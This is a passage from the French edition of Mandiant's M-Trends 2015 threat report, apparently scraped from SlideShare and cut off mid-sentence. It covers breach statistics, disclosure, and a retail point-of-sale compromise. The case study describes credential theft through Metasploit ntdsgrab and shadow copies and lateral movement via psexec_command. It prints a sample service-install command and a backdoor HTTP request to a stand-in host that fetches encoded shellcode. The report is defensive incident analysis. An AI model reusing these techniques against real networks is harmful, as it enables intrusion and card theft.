SlideShare une entreprise Scribd logo
1  sur  28
Télécharger pour lire hors ligne
R A P P O R T S U R L E S M E N A C E S
LES NOUVELLES
DU FRONT
M-Trends®
2015 :
SECURITY
CONSULTING
Les nouvelles du frontM-Trends
Introduction.  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  . 1
Les chiffres clés. .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  . 2
Tendance 1 : Le signalement des attaques informatiques et ses problèmes. .  .  .  .  .  .  .  .  .  .  .  .  . 4
Un public sensible à la cybersécurité. .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  . 4
Rehausser le niveau.  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  . 4
Pourquoi tant d’attaques informatiques révélées dans la presse ? .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  . 5
Tendance 2 : Le commerce et la distribution dans le viseur .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  . 7
Les serveurs d’applications virtuelles comme point d’entrée.  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  . 7
Nouveaux outils, nouvelles tactiques, nouveaux modes opératoires.  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  . 7
Recrudescence des attaques sur les paiements en ligne. .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  . 7
Recommandations. .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  . 12
Tendance 3 : L’évolution du cycle de vie des attaques. .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  . 13
Détournements des connexions VPN. .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  . 13
Dissimulation de malwares sous le nez des victimes. .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  . 14
Vol de mots de passe en toute simplicité.  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  . 18
Déplacements latéraux avec WMI et PowerShell. .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  . 19
Tendance 4 : Entre cybercriminels et groupes APT, la frontière s’estompe. .  .  .  .  .  .  .  .  .  .  .  .  . 20
Évaluer l’intention dans un climat d’incertitude : une tâche délicate.  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  . 20
Ces différences ont-elles une importance ?.  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  . 22
Conclusion. .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  . 23
À propos de Mandiant.  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  . 24
À propos de FireEye. .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  .  . 24
SOMMAIRE
www.mandiant.com	1
INTRODUCTION
Depuis des années, nous ne cessons de répéter que la sécurité
parfaite n’existe pas. Les événements de 2014 devraient nous
donner raison une bonne fois pour toutes.
M
algré quelques modestes progrès
dans les capacités des entreprises à
renforcer leur sécurité, les auteurs
d’attaques avancées (ou non) continuent de
trouver les moyens de contourner les dispositifs
de sécurité en place.
Dans le rapport M-Trends de l’an passé, nous
remarquions que la cybersécurité était passée
d’une problématique informatique isolée à une
priorité absolue pour les instances dirigeantes
des entreprises. Cette année, la cybersécurité,
ou plutôt la « cyberinsécurité », a pris le devant
de la scène. Pour les seules premières semaines
de 2015, la question s’est invitée tour à tour
dans le discours du président américain sur l’état
de l’Union1
, dans l’intrigue d’un film à gros
budget2
et dans l’allocution d’ouverture de la
cérémonie des Golden Globe Awards.3
En tant que premier intervenant sur des
incidents de sécurité critiques, Mandiant a
acquis une perspective unique sur les modes
opératoires et les motivations des attaquants.
Les analyses et éclairages livrés dans ce
document sont le fruit d’une expérience cumulée
au cours de centaines de missions sur le terrain.
Au cours des dix dernières années, nous sommes
intervenus aux côtés de clients dans plus de
30 secteurs d’activité à travers le monde.
Malgré une amélioration certaine dans les
systèmes de détection des entreprises, les
pirates ont encore pu agir trop longtemps avant
d’être détectés, soit en moyenne 205 jours en
2014 contre 229 jours en 2013. Dans le même
temps, le nombre d’entreprises ayant découvert
elles-mêmes ce type d’intrusion est resté
globalement stable. En 2014, 69 % des
structures victimes d’une compromission de
sécurité en ont été alertées par des entités
externes, notamment les services de police. Ce
chiffre traduit une légère hausse par rapport à
2013 (67 %) et 2012 (63 %)
Le commerce et la grande distribution sont
restés des cibles privilégiées, à l’heure où les
attaquants déploient de nouvelles méthodes
pour exfiltrer les numéros de carte des systèmes
de paiement en magasin. Dans le domaine des
cartes bancaires à puce avec code PIN, nous
avons observé une recrudescence des attaques
à l’encontre des sites e-commerce et des
prestataires de traitement des paiements.
Par ailleurs, certaines branches d’activité dans
lesquelles nous étions jusqu’alors peu interve­
nus se sont trouvées en ligne de mire : Services
aux entreprises, santé, organismes publics et
organisations internationales.
Dès que les équipes de sécurité déploient de
nouvelles lignes de défense, les pirates changent
de tactique. L’an passé, cette dynamique s’est
développée à grande échelle, sous nos yeux.
Aussi avons-nous pu observer les nouvelles
méthodes (ou parfois des méthodes éprouvées
remises au goût du jour) employées par les
attaquants pour infiltrer les réseaux privés
virtuels (VPN), échapper à toute détection,
dérober des identifiants de connexion et
maintenir une présence furtive et persistante
dans les environnements compromis.
L’année 2014 fut également marquée par une
hausse des déclarations publiques d’incidents de
sécurité par les victimes elles-mêmes. Pour
autant, ces dernières restent plus que jamais
dans le flou sur une question essentielle : qui
m’attaque ? D’autant que la frontière tend à
s’estomper entre les cybercriminels ordinaires
et les groupes à la solde d’États, à mesure que
les premiers haussent leur niveau de jeu et que
les seconds utilisent des kits d’attaque clé-en-
main pour brouiller les pistes.
Ensemble, ces développements dépeignent un
tableau des menaces plus complexe que jamais.
Dans ce contexte, jamais la mission des équipes
de sécurité n’a été aussi difficile – et cruciale –
pour prévenir, détecter, analyser et réagir aux
attaques.
1	
Michael D. Shear (The New York Times). “Obama to Announce Cybersecurity Plans in State of the Union Preview.” Janvier 2015.
2	
Sheri Linden (The Hollywood Reporter). “’Blackhat’: Film Review.” Janvier 2015.
3	
Christopher Palmeri (Bloomberg). “Hollywood ‘Spoiled Brats’ Are Easy Targets at Golden Globes.” Janvier 2015.
2 	 www.mandiant.com
Les nouvelles du frontM-Trends
Plusieurs secteurs dans lesquels nous avions
jusqu’alors peu enquêté sont apparus comme
de nouvelles cibles privilégiées :
Services aux entreprises
Organismes publics et organisations
internationales
Santé
6 %
Santé
5 %
Transports
3 %
Aérospatiale
et défense
7 %
Services
juridiques
8 %
Autre
7 %
High-tech et
informatique
8 %
Construction et ingénierie
17 %
Services aux entreprises
7 %
Organismes publics et
organisations internationales
14 %
Commerce et distribution
10 %
Services financiers
3%
8 %
Médias et divertissements
5%
En 2014, nous avons observé des variations du nombre
de nos interventions dans certains domaines :
Commerce et distribution — de 4 % à 14 %
Médias et divertissements — de 13 % à 8 %
Secteurs d’activité dans lesquels Mandiant a enquêté sur des intrusions
LES CHIFFRES CLÉS
Un large éventail d’industries a été pris pour cible en 2014, y compris dans des
branches autrefois relativement épargnées. De même, bien que les entreprises aient
été plus promptes à découvrir une compromission qu’en 2013, elles ont encore laissé
beaucoup trop de temps aux attaquants pour agir incognito. Pire encore, elles ont été
moins nombreuses que les années précédentes à découvrir l’intrusion par leurs
propres moyens.
www.mandiant.com	3
Le phishing, vecteur d’APT
des e-mails de phishing recensés
utilisaient l’angle de l’informatique
ou de la sécurité, les attaquants se
faisant souvent passer pour un édi-
teur d’antivirus ou le département
informatique de l’entreprise ciblée
78 %
des e-mails de
phishing ont été
envoyés pendant
les jours ouvrés
de la semaine
72 %
Dim
Sam
Ven
Jeu
Mer
Mar
Lun
Des menaces très diverses
NUISANCE VOLDEDONNÉES CYBERCRIME HACKTIVISME DESTRUCTION
Objectif
Accès et
propagation
Motivations écono-
miques ou politiques
Gain financier
Diffamation,
publicité négative
Perturbation
des opérations
Exemple
Botnets
et spam
GroupesAPT(Advanced
PersistentThreat)
Vol de numéros
de cartes
Défiguration
de site
Suppression
de données
Ciblé
Caracté-
ristique
Souvent
automatisé
Persistant
Souvent
opportuniste
Forte visibilité
Motivé par
un conflit
Les attaquants exploitent les réseaux de leurs victimes dans des buts économiques et politiques de plus en plus variés.
Lapse de temps entre la première preuve
tangible d’une compromission et sa découverte
205
Nombre moyen de jours de présence
des attaquants sur le réseau de la
victime avant d’être détectés
24 jours de moins qu’en 2013
Présence la plus longue : 2 982 jours
Qui découvre la compromission ?
31 %
des victimes ont
détecté la compro-
mission en interne
69 %
ont été alertées par
une entité externe
4 	 www.mandiant.com
Les nouvelles du frontM-Trends
TENDANCE 1 :
LE SIGNALEMENT DES ATTAQUES
INFORMATIQUES ET SES
PROBLÈMES
Plus que jamais, les incidents de sécurité propulsent les entreprises victimes sous
le feu des médias de plus en plus pressants sur les informations à communiquer.
E
n 2014, nous sommes intervenus auprès
de plus de 30 entreprises qui avaient
publiquement déclaré une compromission
de données, souvent dans le sillage tourmenté
de révélations dans les médias. D’après notre
expérience, les entreprises ont tout intérêt à
délivrer un message clair et précis, basé sur les
informations factuelles d’une analyse de la
compromission. Ce faisant, elles éviteront de
devoir faire marche-arrière sur des communi-
qués antérieurs – et de perdre toute crédibilité
au passage.
Un public sensible à la cybersécurité
Le flot apparemment incessant de compromis-
sions divulguées en 2014 a éveillé l’intérêt de
l’opinion publique aux problématiques des
attaques ciblées et de leurs impacts. En consé-
quence, les journalistes, partenaires, investis-
seurs et consommateurs ont tendance à poser
des questions plus avisées et détaillées en cas de
signalement. Ils ne se contentent plus seulement
de savoir quand l’incident a eu lieu et quelles
données ont été exposées. Ils exigent désormais
des détails qui vont du type de malware utilisé à
la méthode employée par les attaquants pour
persister sur le réseau.
Ils se montrent également plus insistants pour
savoir qui se cache derrière l’attaque. Ainsi, on
nous demande souvent d’attribuer un acte
malveillant à tel ou tel auteur dès le premier jour
de l’enquête, alors que nous commençons à
peine à rassembler les preuves. Même lorsque
l’enquête avance, il est de plus en plus difficile de
désigner des coupables avec certitude, dans la
mesure où les différents profils d’attaquants
tendent désormais à utiliser les mêmes outils
(voir « Tendance 4 : Entre cybercriminels et
groupes APT, la frontière s’estompe », en
page 20).
Rehausser le niveau
À l’heure où de plus en plus d’informations
doivent être divulguées, les entreprises victimes
prennent peu à peu conscience du caractère
crucial d’une communication de crise maitrisée
et cohérente. Au moment de rendre l’incident
La formulation d’une stratégie de communication efficace passe donc
par une bonne compréhension de la portée et de l’étendue de la compro-
mission. L’entreprise évitera ainsi de perdre toute crédibilité en revenant
sur ses déclarations passées.
www.mandiant.com	5
public, elles doivent souvent trancher dans le vif
sur les éléments à dévoiler — même lorsque de
nombreuses zones d’ombre subsistent.
Dans bien des cas, les entreprises doivent lutter
de toutes parts pour garder la maîtrise de la
situation. Ainsi, nous avons vu des scénarios
dans lesquels différentes spéculations sur les
modes d’infiltration des attaquants ont déclen-
ché une avalanche de démentis, alors même que
les enquêteurs tentaient de circonscrire et
neutraliser l’incident.
Dans ce genre de situation, les enquêteurs
passent leur temps à rejeter les hypothèses les
plus diverses au lieu de se concentrer sur leur
mission première : trouver des indices et faire
avancer l’enquête.
Pourquoi tant d’attaques
informatiques dans la presse ?
On nous demande souvent pourquoi les
entreprises sont de plus en plus nombreuses à
signaler les attaques informatiques dont elles
sont victimes. Bien qu’il n’existe pas de réponse
définitive, nous voyons deux éléments détermi-
nants dans cette tendance. Premièrement, par
rapport aux années précédentes, nous sommes
intervenus sur davantage de cas où des données
de cartes bancaires ou d’identification person-
nelle (PII) avaient été exposées. Or, dans bien
des cas, la loi impose maintenant aux entreprises
victimes de signaler certains aspects de tels
incidents.
Par ailleurs, dans 69 % des incidents que nous
avons traités en 2014, les victimes n’ont pas été
en mesure de détecter elles-mêmes la présence
des attaquants, n’apprenant la nouvelle que par
le biais d’une entité externe (fournisseur, client
ou autorités).
En d’autres termes : si vous découvrez l’attaque
informatique dont vous faites l’objet, il y a fort à
parier que d’autres — et pas seulement les
attaquants eux-mêmes — auront aussi eu vent
de l’incident.
Qu’elle décide ou non de rendre un incident
public, l’entreprise ne doit jamais perdre de vue
le fait que même si les principales parties pre-
nantes veulent des réponses immédiates, les
enquêtes peuvent prendre des semaines, voire
des mois avant que les faits n’émergent. D’où
l’importance capitale de bien comprendre la
portée et l’étendue de la compromission au mo-
ment de définir votre communication de crise.
À RETENIR : En divulguant les incidents de sécurité dont elles ont été
victimes, de plus en plus d’entreprises se retrouvent sous le feu de la rampe.
Médias, clients, partenaires… tous commencent à prendre conscience du fait que
les compromissions sont inévitables. Dans le même temps, ils demandent aussi plus
d’informations et de détails. Pour bien se préparer à une telle éventualité, les
entreprises doivent mettre en place une stratégie de communication efficace. Or,
les meilleures stratégies s’établissent et s’appliquent sur la base de faits tangibles,
issus d’une enquête rigoureuse.
6 	 www.mandiant.com
Les nouvelles du frontM-Trends
MENER UNE
ENQUÊTE EFFICACE
Nous dressons ici la liste des questions que les médias, investisseurs et
clients posent inlassablement lors du signalement public d’un incident de
sécurité. Du côté des entreprises victimes, tous les intervenants devront
s’accorder sur les réponses à donner pour éviter toute imprécision ou
incohérence dans leurs déclarations publiques.
Comment les attaquants se sont-ils
infiltrés dans votre environnement ?
La recette des attaquants se compose généralement
d’un mélange d’ingénierie sociale et de vulnérabilités
inconnues ou non corrigées. Exploitation d’un serveur
Internet, envoi d’une pièce jointe paraissant légitime
par e-mail, infection d’un site Web très visité par les
publics ciblés... les tactiques varient. D’où l’importance
de bien se préparer à expliquer comment les
malfaiteurs sont parvenus à s’infiltrer. Plus capital
encore, l’entreprise devra pouvoir déclarer avec
certitude si l’accès a été bloqué et l’attaque
neutralisée.
Comment les attaquants sont-ils
parvenus à maintenir un accès à
l’environnement ?
Les attaquants ont souvent besoin d’un accès continu
à l’environnement infiltré. Pour les en déloger, vous
devrez trouver et bloquer toutes les voies d’accès
utilisées. Parmi les méthodes privilégiées, on trouve
notamment les portes dérobées (backdoors), les
webshells, les accès via le VPN et autres systèmes
de connexion à distance des entreprises.
Comment l’attaque s’est-elle déroulée ?
Bien comprendre comment des attaquants sont
parvenus à s’introduire sur le réseau et à en exfiltrer
des données est un passage obligé pour la prévention
d’une récidive. Sans un diagnostic précis de l’ampleur
de l’attaque, il est très difficile d’en mesurer l’impact
– et encore plus de l’enrayer.
Quelles données les attaquants ont-ils
dérobées ?
Seule une analyse forensique des systèmes compromis
permet généralement de répondre à cette question.
Parfois, votre propre examen n’apportera que des
éléments de réponse partiels.
Travaillez toujours au contact de votre équipe juri-
dique pour déterminer vos obligations légales en
fonction des types de données volées, que la
compromission soit supposée ou avérée.
Avez-vous neutralisé l’attaquant ?
Si vous avez pu répondre aux quatre premières
questions, celle-ci ne devrait normalement pas poser
de problème. Une bonne compréhension du déroulé
de l’attaque vous permettra de mieux la combattre et
de mieux vous en relever.
www.mandiant.com	7
4	
U.S. Department of Homeland Security and U.S. Secret Service. “Backoff Malware: Infection Assessment.” Août 2014.
TENDANCE 2 :
LE COMMERCE ET LA
DISTRIBUTION DANS LE VISEUR
Le monde du commerce et de la distribution s’est retrouvé au centre d’attaques
qui ont touché plus de 1 000 entreprises et contraint un nombre incalculable de
consommateurs à remplacer leurs cartes bancaires en 2014.4
Mais au-delà du
volume d’attaques perpétrées, nos enquêtes ont révélé l’existence de nouveaux
groupes, kits d’outils et techniques d’attaques.
Les serveurs d’applications virtuelles
comme point d’entrée
La virtualisation d’applications permet aux
utilisateurs de se connecter à distance à des
programmes hébergés sur un poste de travail
virtuel sécurisé. Une bonne configuration de cet
environnement permet de créer une bulle de
protection dans laquelle les utilisateurs peuvent
évoluer en toute sécurité. Mais dans certains
cas, même les erreurs de configuration les plus
mineures peuvent ouvrir des brèches dans
lesquelles les attaquants ne tardent pas à
s’engouffrer pour aller rebondir sur d’autres
parties du système.
Dans toutes nos enquêtes mettant en lumière ce
vecteur d’attaque, nous avons observé la même
faille de sécurité : l’accès à distance ne s’effec­
tuait que par l’utilisation d’un login et mot de
passe, soit un seul facteur d’authentification,
alors que deux facteurs auraient bloqué l’accès.
Nouveaux outils, nouvelles
tactiques, nouveaux modes
opératoires
Les nouveaux groupes d’attaques apportent
avec eux leur lot d’outils, de tactiques et de
modes opératoires. Ainsi, nous avons observé
les schémas d’attaque les plus variés, des
hackers débutants équipés d’outils largement
accessibles jusqu’aux groupes installant des
malwares sophistiqués pour la collecte de
numéros de cartes sur des terminaux de
paiement en magasin.
Toutefois, le niveau de compétences importe
peu puisque les attaquants novices se sont mon-
trés tout aussi aptes à extorquer des numéros
de cartes que des groupes plus expérimentés.
Dans tous les cas de figure, les malfaiteurs ont
pu agir en sous-marin dans l’environnement de
leurs victimes, obtenir l’accès aux terminaux de
paiement et y installer des malwares pour la
collecte des numéros de carte.
Recrudescence des attaques sur les
paiements e-commerce par carte
Les cartes à puce avec code PIN des systèmes
Europay, MasterCard et Visa (EMV) débarquent
enfin sur le marché américain. Omniprésentes
depuis des décennies à travers le monde, ces
cartes ont pourtant tardé à s’imposer dans les
enseignes outre-Atlantique.
L’une de leurs particularités est de générer un
code unique à chaque transaction, ce qui rend
leur contrefaçon plus difficile et peut
contraindre les cybercriminels à se rabattre sur
des proies plus faciles. Dans les pays qui ont
adopté la technologie EMV, nous avons noté une
augmentation de nos interventions sur des cas
de compromissions de sites e-commerce et de
prestataires de paiement.
8 	 www.mandiant.com
Les nouvelles du frontM-Trends
ÉTUDE DE CAS
Une grande enseigne américaine victime d’une compromission de millions de
cartes de crédit sur une période de 3 mois
Le schéma d’attaque ressemble à de
nombreux autres scénarios observés
dans la grande distribution en 2014 :
accès distant au réseau de l’enseigne au
moyen d’identifiants valides, utilisation
des autorisations associées pour se
déplacer latéralement sur le réseau et
déploiement de malwares sur les
caisses des magasins. Ce n’est qu’après
avoir été alerté par les autorités
américaines que le distributeur a
découvert la compromission.
Point initial de la compro-
mission
L’attaquant s’est d’abord connecté au
serveur d’applications virtuelles au
moyen d’identifiants légitimes. Le
serveur d’applications lui a alors
accordé un droit d’accès limité à un
poste de travail virtuel. Nous n’avons
trouvé aucun échec de connexion, ce
qui indique que l’attaquant avait obtenu
ces identifiants en amont.
(Les éléments en notre possession ne
nous permettent cependant pas de
définir clairement comment il s’est
procuré ces informations.)
Il a ensuite profité d’une petite erreur
de configuration du poste de travail
virtuel pour s’octroyer un privilège
d’accès en ligne de commande,
c’est-à-dire prendre le contrôle direct
du système. Il est ensuite passé par un
site FTP Windows pour télécharger un
outil de type « password dump » qui lui
a permis d’obtenir le mot de passe du
compte administrateur local. Ce mot de
passe était le même pour tous les
systèmes de l’environnement de cette
enseigne.
Tout ceci s’est déroulé en l’espace de
quelques minutes.
Déplacement latéral
Lors de ses premières manœuvres,
l’attaquant a utilisé Metasploit pour se
déplacer latéralement dans l’environ­
nement. Metasploit est un framework
open source qui sert à développer,
tester et exécuter du code d’exploit.
Son vaste choix de modules aide les
utilisateurs à trouver et exploiter des
faiblesses sur les systèmes ciblés. Cette
richesse fonctionnelle en fait un outil
prisé, tant des cybercriminels que des
chercheurs en sécurité.
En l’occurrence, l’attaquant a utilisé le
module Metasploit psexec_command,
ce qui lui a permis d’exécuter des
commandes sous forme de service
Windows sur le système compromis.
Or, cette action laisse un certain
nombre de traces dans les journaux
d’événements systèmes Windows.
Tout en maintenant son accès aux
systèmes compromis, l’attaquant s’est
ensuite tourné vers le contrôleur de
domaine du siège de l’enseigne, c’est-
à-dire le serveur qui gère l’authentifica-
tion dans l’environnement Windows.
Rien de plus facile pour lui puisque les
identifiants d’administrateur local qu’il
s’était procurés lui permettaient aussi
d’accéder au contrôleur de domaine. À
l’aide du module Metasploit ntdsgrab, il
est ensuite parvenu à obtenir une copie
de la base de données NTDS et des
registres du système.
La base NTDS stocke les informations
Active Directory utilisées par les
contrôleurs de domaine, y compris les
hashs des noms d’utilisateur et mots de
passe. Le module ntdsgrab utilise le
Service de cliché instantané des
volumes (VSS, Volume Shadow Copy
Service) de Windows pour créer un
cliché instantané de la partition qui
contient la base de données NTDS.
VSS a pour rôle de créer un snapshot
du système à des fins légitimes de
sauvegarde et de restauration. Mais
dans le cas présent, l’attaquant s’en est
servi pour créer une copie de la base
NTDS. Dès lors, il a pu recourir à
d’autres outils pour en extraire les
hashs de mots de passe.
Une fois les hashs du mot de passe de
l’administrateur de domaine craqués,
l’attaquant a pu se déplacer latérale-
ment au sein de l’environnement.
À ce stade, il est passé de Metasploit à
des techniques de déplacement latéral
plus traditionnelles, notamment les
connexions réseau non-interactives,
l’outil Microsoft SysInternals PsExec et
des connexions RDP (Remote Desktop
Protocol). Une fois connecté au serveur
d’applications virtuelles au moyen des
identifiants de l’administrateur de
domaine, l’attaquant a pu étendre son
accès en se connectant aux systèmes
via RDP.
Porte dérobée
Pour maintenir sa présence dans l’en-
vironnement compromis, l’attaquant a
installé une porte dérobée (backdoor)
sur plusieurs machines, sous la forme
d’un pilote malveillant conçu pour
cibler les systèmes Windows XP.
Le malware avait été compressé
à l’aide d’un programme ultrasophis-
tiqué, semblable à ceux que l’on trouve
sur des malwares avancés et pourtant
largement accessibles. Le pilote se
décompresse d’abord en mémoire,
avant de lancer un nouveau thread
système.
Le pilote original alerte ensuite le
système de son échec de chargement.
www.mandiant.com	9
Mode de fonctionnement
de psexec_command :
Le module psexec_command écrit la
commande à exécuter et le fichier de
sortie (fichier texte) dans un fichier de
commandes Windows. Les noms du
fichier texte et du fichier de commande
Windows comportent 16 caractères
générés de manière aléatoire.
psexec_command exécute ensuite le
fichier de commandes Windows créé
dans la première étape.
La figure 1 illustre l’information telle
qu’elle est inscrite dans le journal
d’événements système Windows.
Figure 1 : Installation de service via le module Metasploit psexec_command
A service was installed in the system.
Service Name: MRSWxwQmQxFGumEFsW
Service File Name: %COMSPEC% /C echo dir ^>
%SYSTEMDRIVE%WINDOWSTempTthwsVKvUhydrsNB.txt >
WINDOWSTempRbhRmgALAHcdyWXG.bat & %COMSPEC% /C
start %COMSPEC% /C WINDOWSTempRbhRmgALAHcdyWXG.
bat
Service Type: user mode service
Service Start Type: demand start
Parce que le code est décompressé
dans un processus séparé du pilote
original, le malware est actif en dépit du
fait que Windows ne reconnaît pas le
chargement du pilote. Ces techniques
servent à entraver les efforts de
rétroingénierie et à dissimuler la
présence d’une porte dérobée.
La porte dérobée tire ses fonctionnali-
tés d’un shellcode que le pilote décom-
pressé injecte dans les processus de
l’espace utilisateur (processus qui s’exé-
cutent en dehors du noyau Windows).
Le shellcode lance une requête HTTP
POST à une adresse IP codée en dur et
télécharge un shellcode encodé en XOR
contenu dans un commentaire HTML.
Cette technique a rendu la porte
dérobée particulièrement flexible. Pour
y ajouter de nouvelles fonctionnalités, il
suffisait à l’attaquant de télécharger et
d’exécuter un nouveau shellcode. Ce
schéma d’utilisation d’un shellcode n’est
pas nouveau, mais le duo qu’il formait
avec le programme de compression en
ont fait un malware particulièrement
sophistiqué.
La figure 2 illustre le mode de commu-
nication entre le système infecté et le
serveur de commande et contrôle
(CnC).
Figure 2 : Communication par la porte dérobée
POST /evil.txt HTTP/1.0
Accept: */*
Content-Length: 32
Content-Type: application/octet-stream
User-Agent: Evil_UA_String
Host: 1.2.3.4
Pragma: no-cache
<POST_DATA>
<!-XOR_Encoded_Shellcode -->
La porte dérobée envoie une requête HTTP POST
au serveur de commande et contrôle (CnC)
Téléchargement et exécution
d’un shellcode encodé en XOR
Système
infecté
CnC du
hacker
10 	 www.mandiant.com
Les nouvelles du frontM-Trends
Toutes les caisses de
tous les magasins de
l’enseigne s’authen-
tifiaient auprès du
contrôleur de
domaine central.
En d’autres termes,
quiconque avait accès
au contrôleur de
domaine pouvait
accéder directement
aux caisses des
magasins.
Exfiltration de données
Une fois en possession du mot de passe
administrateur du domaine, l’attaquant
a pu accéder à sa guise aux systèmes
Windows de l’environnement informa-
tique du siège de l’entreprise.
De là, il s’est attelé à obtenir l’accès à
l’environnement informatique des
magasins.
Cet environnement était configuré
comme suit :
•	 Le domaine des magasins avait une
relation bidirectionnelle avec le
domaine du siège.
•	 Les caisses des magasins étaient
sous Microsoft Windows XP.
•	 Les caisses étaient reliées au
domaine des magasins.
Cette configuration, très courante dans
la grande distribution, a donné deux
avantages à l’attaquant.
Premièrement, les identifiants d’admini­
strateur de domaines lui ont donné des
privilèges d’accès aux systèmes du
domaine des magasins.
Deuxièmement, le domaine des maga-
sins était un domaine enfant du domaine
du siège. Aussi, pour maintenir certaines
fonctionnalités actives, plusieurs ports
critiques devaient rester ouverts en
permanence entre les contrôleurs de
domaine du siège et les magasins. Or,
ces ports ouverts contournaient toutes
les autres règles mises en place sur les
pare-feu. L’attaquant s’est donc servi de
ces ports ouverts pour accéder au
contrôleur de domaine, qui à son tour
lui a permis de s’introduire dans
l’environnement des magasins.
Toutes les caisses de tous les magasins
de l’enseigne s’authentifiaient auprès
du contrôleur de domaine central. En
d’autres termes, quiconque avait accès
au contrôleur de domaine pouvait
accéder directement aux caisses des
magasins. À l’aide d’un script de
commandes Windows sur le contrôleur
de domaine des magasins, l’attaquant a
copié le malware de collecte d’informa-
tions de cartes bancaires sur chacune
des caisses des points de vente.
Une tâche Windows planifiée lui a
ensuite permis d’activer le malware.
C’est ainsi qu’il a pu extraire des infor-
mations de la mémoire de traitement
de l’application, notamment le numéro
de compte et la date d’expiration
enregistrés sur la bande magnétique de
la carte. Ces informations peuvent
ensuite être revendues à des spécia­
listes de la contrefaçon de cartes.
Le malware est passé par OSQL, un
outil de requête de ligne de commande
SQL préinstallé sur les caisses, pour
inscrire les données des cartes ban-
caires sur la base de données MSSQL
temporaire tempdb. Les données de la
table tempdb sont effacées dès l’arrêt
du service MSSQL. Une fois par jour,
l’attaquant envoyait donc une requête à
la base tempdb sur toutes les caisses
des magasins. Les données transmises
en retour étaient ensuite transférées
vers un fichier texte sur le contrôleur
de domaine.
De là, l’attaquant archivait le fichier
texte et l’envoyait à un poste de travail
connecté à Internet dans l’environne-
ment des magasins. Il ne lui restait alors
plus qu’à le charger sur un serveur sous
son contrôle via le protocole FTP.
La figure 3 retrace le déroulé de
l’attaque.
www.mandiant.com	11
Figure 3 : Résumé de l’attaque
L’attaquant a trouvé une brèche dans l’appli-
cation virtuelle qui lui a permis de se déplacer
latéralement au sein de l’environnement infor-
matique du siège. De là, il a pu récupérer des
identifiants de connexion sur les systèmes de
l’environnement.
2 L’attaquant s’est servi du contrôleur de
domaine des magasins comme plaque
tournante pour l’accès aux caisses dans
les points de vente. Il y a ensuite installé
un malware qui collectait les données de
cartes bancaires sur chacune de ces
caisses.
3
L’attaquant s’est infiltré à distance dans l’environnement
de l’entreprise via un serveur d’applications virtuelles. Il
s’est ensuite authentifié au moyen d’identifiants valides.
1 L’attaquant a collecté les
données de cartes ban-
caires sur les caisses des
magasins, avant de les
transférer du contrôleur
de domaine vers un poste
de travail utilisateur dans
l’environnement des maga-
sins. Les données volées
ont ensuite été exfiltrées
via FTP vers un site FTP
externe sous son contrôle.
4
Serveur
d’applications
virtuelles
Contrôleur
de domaine
du siège
Contrôleur de
domaine des
magasins
Poste de
travail
utilisateur
Accès initial Exfiltration de données via FTP
Poste de
travail
utilisateur
Caisse 1 Caisse 2
Magasin 2
Domaine des magasinsDomaine du siège
DMZ
Caisse 1 Caisse 2
Magasin 1
Trafic CnC
Attaquant
12 	 www.mandiant.com
Les nouvelles du frontM-Trends
À RETENIR : L’argent attire le crime. De fait, la grande distribution a toujours
